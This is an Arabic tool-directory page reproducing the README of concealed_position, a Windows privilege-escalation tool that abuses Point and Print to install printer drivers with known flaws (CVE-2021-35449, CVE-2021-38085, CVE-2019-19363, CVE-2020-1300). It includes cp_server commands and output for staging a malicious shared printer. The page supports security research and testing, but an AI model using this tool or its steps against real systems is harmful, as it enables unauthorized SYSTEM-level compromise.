Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
concealed_position — أداة تصعيد صلاحيات عبر برنامج تشغيل الطابعة الخاص بك | Kitploit
أدوات/GitHubGitHub/jacob-baines/concealed_position
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراق
GitHubjacob-baines/concealed_position

concealed_position

أداة تصعيد صلاحيات عبر برنامج تشغيل الطابعة الخاص بك

عرض المستودع
2634452منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

موضع مخفي

موضع مخفي هو هجوم تصعيد الصلاحيات المحلي ضد ويندوز باستخدام مفهوم "اجلب ثغرةك الخاصة". على وجه التحديد، يستخدم موضع مخفي (CP) منطق النقاط والطباعة كما هو مصمم في ويندوز الذي يسمح لمستخدم ذي صلاحية منخفضة بمرحلة وتثبيت برامج تشغيل الطابعات. يقوم CP بتثبيت برامج تشغيل بها ثغرات معروفة ثم يتم استغلالها للتصعيد إلى SYSTEM. تم عرض موضع مخفي لأول مرة في DEF CON 29.

ما هي الثغرات المتاحة

يقدم موضع مخفي أربعة ثغرات - جميعها بأسماء غبية بنفس القدر:

  • ACIDDAMAGE - CVE-2021-35449 - Lexmark Universal Print Driver LPE
  • RADIANTDAMAGE - CVE-2021-38085 - Canon TR150 Print Driver LPE
  • POISONDAMAGE - CVE-2019-19363 - Ricoh PCL6 Print Driver LPE
  • SLASHINGDAMAGE - CVE-2020-1300 - Windows Print Spooler LPE

الثغرات جميلة لأنه، باستثناء SLASHINGDAMAGE، ستستمر في العمل حتى بعد تصحيح المشكلات. الآلية الوحيدة التي يمتلكها ويندوز لمنع المستخدمين من استخدام برامج تشغيل قديمة هي إلغاء شهادة برنامج التشغيل - وهو شيء لم يتم فعله تاريخياً (؟).

لكن أي ثغرة يجب أن أستخدمها؟!

على الأرجح ACIDDAMAGE. RADIANTDAMAGE و POISONDAMAGE هما سباق (للكتابة فوق DLL) و SLASHINGDAMAGE، من المأمول، قد تم تصحيحها في كل مكان.

كيف يعمل؟

يتكون موضع مخفي من جزأين. طابعة خبيثة وعميل. يتصل العميل بالخادم، ويسحب برنامج تشغيل، ويخزن برنامج التشغيل في مخزن برامج التشغيل، ويُثبت الطابعة، ويستغل عملية التثبيت. سهل! في لغة MSAPI، يبدو الهجوم كالتالي:

الخطوة 1: مرحلة برنامج التشغيل في مخزن برامج التشغيل
العميل إلى الخادم: GetPrinterDriver
الخادم إلى العميل: الاستجابة مع برنامج التشغيل

المرحلة 2: تثبيت برنامج التشغيل من مخزن برامج التشغيل
العميل: InstallPrinterDriverFromPackage

المرحلة 3: إضافة طابعة محلية (مرحلة الاستغلال)
العميل: إضافة طابعة

من المهم ملاحظة أن SLASHINGDAMAGE لا يعمل بهذه الطريقة في الواقع. SLASHINGDAMAGE هو تطبيق لهجوم الطابعة الخبيثة الموصوف في DEFCON 28 (2020) وتم تصحيحه منذ فترة طويلة. لكني أستمتع بهذا الهجوم (لقد أثار بقية هذا التطوير) وقررت أن أترك الثغرة في خادمي الخبيث... على الرغم من أن ذلك قد يكون مربكًا.

هل هذه ثغرة في ويندوز؟

يمكن القول، نعم. مخزن برامج التشغيل هو "مجموعة موثوقة من ... حزم برامج تشغيل تابعة لجهات خارجية" والتي تتطلب وصول المسؤول لتعديلها. باستخدام GetPrinterDriver يمكن لمهاجم منخفض الصلاحية مرحلة برامج تشغيل عشوائية في المخزن. هذا، بالنسبة لي، يتجاوز حدوداً أمنية واضحة.

يبدو أن مايكروسوفت وافقت عندما أصدرت CVE-2021-34481.

على الرغم من... أنه يمكن القول أن هذه مجرد ميزة للنظام وليست ثغرة على الإطلاق. لا يهم كثيرًا حقًا. يمكن للمهاجم التصعيد إلى SYSTEM على تثبيتات ويندوز العادية.

أي إصدارات من ويندوز متأثرة بـ CVE-2021-34481؟

على الأقل ويندوز 8.1 وما فوق.

كيف أستخدم هذه الأدوات؟

بسيط! بسيط جدًا لدرجة أنه سيكون هناك العديد من الفقرات لوصفها!

خادم CP

أولاً، دعنا نلقي نظرة على خيارات سطر الأوامر لـ cp_server:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe
 _______  _______  __    _  _______  _______  _______  ___      _______  ______
|       ||       ||  |  | ||       ||       ||   _   ||   |    |       ||      |
|       ||   _   ||   |_| ||       ||    ___||  |_|  ||   |    |    ___||  _    |
|       ||  | |  ||       ||       ||   |___ |       ||   |    |   |___ | | |   |
|      _||  |_|  ||  _    ||      _||    ___||       ||   |___ |    ___|| |_|   |
|     |_ |       || | |   ||     |_ |   |___ |   _   ||       ||   |___ |       |
|_______||_______||_|  |__||_______||_______||__| |__||_______||_______||______|
 _______  _______  _______  ___   _______  ___   _______  __    _
|       ||       ||       ||   | |       ||   | |       ||  |  | |
|    _  ||   _   ||  _____||   | |_     _||   | |   _   ||   |_| |
|   |_| ||  | |  || |_____ |   |   |   |  |   | |  | |  ||       |
|    ___||  |_|  ||_____  ||   |   |   |  |   | |  |_|  ||  _    |
|   |    |       | _____| ||   |   |   |  |   | |       || | |   |
|___|    |_______||_______||___|   |___|  |___| |_______||_|  |__|    خادم!

خيارات سطر الأوامر:
  -h, --help                     عرض رسالة المساعدة
  -e, --exploit arg              الثغرة المراد استخدامها
  -c, --cabs arg (=.\cab_files)  مسار ملفات الكابينة

الثغرات المتاحة:
        ACIDDAMAGE
        POISONDAMAGE
        RADIANTDAMAGE
        SLASHINGDAMAGE

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

أعلاه يمكنك رؤية أن الخادم يتطلب خيارين:

  1. الثغرة لتكوين الطابعة من أجلها
  2. مسار إلى ملفات cab_files لهذا المستودع (.\cab_files\ هو الافتراضي)

على سبيل المثال، لنفترض أننا نريد تكوين طابعة خبيثة تقدم برنامج تشغيل ACIDDAMAGE. فقط افعل هذا:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe -e ACIDDAMAGE
 _______  _______  __    _  _______  _______  _______  ___      _______  ______
|       ||       ||  |  | ||       ||       ||   _   ||   |    |       ||      |
|       ||   _   ||   |_| ||       ||    ___||  |_|  ||   |    |    ___||  _    |
|       ||  | |  ||       ||       ||   |___ |       ||   |    |   |___ | | |   |
|      _||  |_|  ||  _    ||      _||    ___||       ||   |___ |    ___|| |_|   |
|     |_ |       || | |   ||     |_ |   |___ |   _   ||       ||   |___ |       |
|_______||_______||_|  |__||_______||_______||__| |__||_______||_______||______|
 _______  _______  _______  ___   _______  ___   _______  __    _
|       ||       ||       ||   | |       ||   | |       ||  |  | |
|    _  ||   _   ||  _____||   | |_     _||   | |   _   ||   |_| |
|   |_| ||  | |  || |_____ |   |   |   |  |   | |  | |  ||       |
|    ___||  |_|  ||_____  ||   |   |   |  |   | |  |_|  ||  _    |
|   |    |       | _____| ||   |   |   |  |   | |       || | |   |
|___|    |_______||_______||___|   |___|  |___| |_______||_|  |__|    خادم!

[+] إنشاء مساحة مؤقتة...
[+] توسيع .\cab_files\ACIDDAMAGE\LMUD1o40.cab
[+] الدفع إلى مخزن برامج التشغيل
[+] تنظيف المساحة المؤقتة
[+] تثبيت برنامج تشغيل الطباعة
[+] تم تثبيت برنامج التشغيل!
[+] تثبيت طابعة مشتركة
[+] تم تثبيت الطابعة المشتركة!
[+] انتهت الأتمتة.
[!] خطوات يدوية هامة!
[0] في إعدادات المشاركة المتقدمة، قم بإيقاف تشغيل "المشاركة المحمية بكلمة مرور".
[1] جاهز للانطلاق!

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

وهذا كل شيء، سترى طابعة جديدة على نظامك:

PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin> Get-Printer

Name                           ComputerName    Type         DriverName                PortName        Shared   Publishe
                                                                                                               d
----                           ------------    ----         ----------                --------        ------   --------
ACIDDAMAGE                                     Local        Lexmark Universal v2      LPT1:           True     False
CutePDF Writer                                 Local        CutePDF Writer v4.0       CPW4:           False    False
OneNote for Windows 10                         Local        Microsoft Software Pri... Microsoft.Of... False    False
Microsoft XPS Document Writer                  Local        Microsoft XPS Document... PORTPROMPT:     False    False
Microsoft Print to PDF                         Local        Microsoft Print To PDF    PORTPROMPT:     False    False
Fax                                            Local        Microsoft Shared Fax D... SHRFAX:         False    False


PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

لاحظ أن هناك خطوة يدوية واحدة يطلب منك cp_server القيام بها. لأنني مخترق مبتدئ، لم أستطع معرفة كيفية تعيين "إعدادات المشاركة المتقدمة" -> "إيقاف تشغيل المشاركة المحمية بكلمة مرور" برمجياً. سيكون عليك القيام بذلك بنفسك!

تنزيل الأداة